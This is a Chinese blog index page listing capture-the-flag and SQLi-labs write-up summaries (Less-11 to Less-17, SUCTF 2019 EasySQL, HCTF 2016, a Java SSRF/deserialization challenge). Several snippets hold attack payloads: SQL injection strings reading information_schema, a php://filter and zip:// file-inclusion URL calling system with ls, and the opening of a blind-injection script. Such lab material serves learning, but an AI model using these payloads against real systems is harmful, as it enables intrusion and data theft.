PointerK

2021年1月10日

摘要： show me she shell 这是一道tomato师傅出的不完整的java题，java…，java…我恨java┑(￣Д ￣)┍ 这是一个题目一是列目录+任意文件读取，二是垂直越权+CLRF配SSRF打redis+反序列化命令执行题目的难度在于代码本身的不完整和java，没办法实际测试，所阅读全文

posted @ 2021-01-10 23:38 PointerK 阅读(255) 评论(0) 推荐(0)

[SUCTF 2019]EasySQL

摘要：原文链接 -http://www.xianxianlabs.com/blog/2020/05/27/355.html 阅读全文

posted @ 2021-01-10 22:08 PointerK 阅读(68) 评论(0) 推荐(0)

Hctf 2016 兵者多诡

摘要：很好的利用了php协议 ?fp=php://filter/convert.base64-encode/resource=home ?fp=zip://uploads/515969bfe90c2f52fbcd7e5818e8688b681eea4e.png%23shell&a=system&b=ls 阅读全文

posted @ 2021-01-10 14:00 PointerK 阅读(811) 评论(0) 推荐(0)

2021年1月9日

less-17

摘要： less-17 基本测试 admin' or 1=1 admin') or 1=1 admin" or 1=1 admin") or 1=1 羞辱的回答 okok 查看源码 <?php //including the Mysql connect parameters. include("../sql 阅读全文

posted @ 2021-01-09 17:14 PointerK 阅读(81) 评论(0) 推荐(0)

less-16

摘要： ![](https://img2020.cnblogs.com/blog/2051576/202101/2051576-20210109154240393-250317977.png) 阅读全文

posted @ 2021-01-09 15:42 PointerK 阅读(35) 评论(0) 推荐(0)

less-15

摘要：脚本可以参考 less-14 阅读全文

posted @ 2021-01-09 15:38 PointerK 阅读(55) 评论(0) 推荐(0)

less-14

摘要：测试语句 admin" and 1=1# # right 1493 # error 1454 import requests import time id='"' url="https://sql.alienwares.top/Less-14/" for i in range(1,100): for 阅读全文

posted @ 2021-01-09 15:33 PointerK 阅读(50) 评论(0) 推荐(0)

Less -13

摘要： and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))='e' #&passwd=admin&submit=Submit# 阅读全文

posted @ 2021-01-09 15:18 PointerK 阅读(39) 评论(0) 推荐(0)

2021年1月5日

Less-12

摘要：当请求为admin admin 的时候就会回显其它的时候就会回显失败尝试sql 注入发现不在有回显sql语句的包裹问题 sql报错的内容 You have an error in your SQL syntax; check the manual that corresponds to yo 阅读全文

posted @ 2021-01-05 16:28 PointerK 阅读(64) 评论(0) 推荐(0)

Less-11

摘要：测试发现页面回显注入语句 hackerzcj' union select group_concat(table_name),1 from information_schema.tables where table_schema=database() # 阅读全文

posted @ 2021-01-05 16:05 PointerK 阅读(67) 评论(0) 推荐(0)

公告